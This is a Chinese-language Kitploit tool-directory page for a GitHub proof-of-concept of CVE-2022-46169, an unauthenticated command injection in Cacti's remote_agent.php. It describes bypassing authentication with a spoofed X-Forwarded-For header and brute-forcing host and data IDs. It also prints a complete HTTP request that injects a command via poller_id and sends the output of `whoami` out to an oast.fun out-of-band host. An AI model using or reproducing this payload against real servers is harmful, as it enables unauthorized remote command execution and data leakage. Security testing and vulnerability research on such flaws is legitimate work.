Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-46169 — CVE-2022-46169 Cacti remote_agent.php 未认证命令注入。 | Kitploit
工具/GitHubGitHub/0xf4n9x/cve-2022-46169
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制身份验证
GitHub0xf4n9x/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php 未认证命令注入。

查看仓库
471223年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php 未授权命令注入漏洞。

认证绕过

添加 X-Forwarded-For 请求头即可绕过认证,注意其值并非固定值。

image

image

暴力枚举

使用 Burp Intruder 对 host_id 和 local_data_ids 的值进行模糊测试。

image

image

远程命令执行

命令注入点位于 poller_id 参数。

root@kitploit:~
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1


image

参考

  • https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
下载工具